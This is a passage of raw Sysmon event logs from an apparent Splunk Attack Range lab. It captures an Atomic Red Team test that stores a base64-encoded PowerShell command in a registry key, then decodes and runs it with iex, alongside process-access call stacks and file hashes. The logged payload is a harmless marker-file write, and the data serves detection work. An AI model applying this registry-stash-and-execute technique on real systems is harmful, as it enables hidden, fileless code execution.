ow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64) 154100x80000000000000001697415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.553{05ADC7E1-70EC-603D-7088-00000000AD01}8628C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam /v ART /t REG_SZ /d U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Encoded payload in next command is the following \""Set-Content -path \""$env:SystemRoot/Temp/art-marker.txt\"" -value \""Hello from the Atomic Red Team\""\"" reg.exe add \""HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam\"" /v ART /t REG_SZ /d \""U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"" iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))} 23542300x80000000000000001697414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.536{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5E3E038562BE468028AD19F57B4E716A,SHA256=031B99AB665F1B097CF35EA6EF59257ACF0CD76C537133CEA94CF86613486F5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.521{05ADC7E1-229F-6039-1600-00000000AD01}15407628C:\Windows\system32\svchost.exe{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.521{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.474{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.474{05ADC7E1-229D-6039-0B00-00000000AD01}8525640C:\Windows\system32\lsass.exe{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001697409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-01 22:55:40.464{05ADC7E1-70EC-603D-6F88-00000000AD01}7060\PSHost.132591129403709837.7060.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001697408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.443{05ADC7E1-70EC-603D-6F88-00000000AD01}7060ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_hqoakdue.tiv.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.443{05ADC7E1-70EC-603D-6F88-00000000AD01}7060ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_njlmoaod.1oy.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001697406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.427{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_njlmoaod.1oy.ps12021-03-01 22:55:40.427 10341000x80000000000000001697405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.411{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001697404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.396{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8A9A22AA2E7C6B15A10EBED1DA2375B,SHA256=C4C965897E96E3F2846BE75C889B4B99D219566BCDCF14CAF45C3A8CFBC4A615,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.374{05ADC7E1-7049-603D-4288-00000000AD01}62085740C:\Windows\system32\conhost.exe{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.374{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829C38813) 10341000x80000000000000001697401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.372{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.372{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.371{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.371{05ADC7E1-229F-6039-0C00-00000000AD01}588904C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001697397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.371{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001697396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.370{05ADC7E1-7049-603D-4188-00000000AD01}57848908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+23151500(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc75e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbec214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+706a5407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbb4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc12edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbf63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fbe8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6fc214e6(wow64) 154100x80000000000000001697395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.370{05ADC7E1-70EC-603D-6F88-00000000AD01}7060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Encoded payload in next command is the following \""Set-Content -path \""$env:SystemRoot/Temp/art-marker.txt\"" -value \""Hello from the Atomic Red Team\""\"" reg.exe add \""HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam\"" /v ART /t REG_SZ /d \""U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=\"" iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001697394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.370{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-01 22:53:21.483 11241100x80000000000000001697393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.368{05ADC7E1-7049-603D-4188-00000000AD01}5784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-01 22:53:21.480 23542300x80000000000000001697392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.349{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=366D3833EE6D1ADF87D3CC1944F42703,SHA256=6E7F306E932D2C68BA0E0FEC6ABE9B9FF255FDBED98AA3825B4E9B487FB5BC17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.318{05ADC7E1-7049-603D-4188-00000000AD01}5784ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=D3894BCAE693F1BEA8F5DA4BD24090FD,SHA256=1E436416CB03B75053408CD524FDEF2B65031E9752A1BD1BB74F0A0F25A7EE33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001697390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.286{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B942FE41D1EB98AC97A368AAC36D6A0E,SHA256=A826448224363AB2AC3A08F45DB0A2BE4C161442E64166F13A34FA28CC60DC37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001697389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-704C-603D-4488-00000000AD01}8476C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.255{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7049-603D-4288-00000000AD01}6208C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 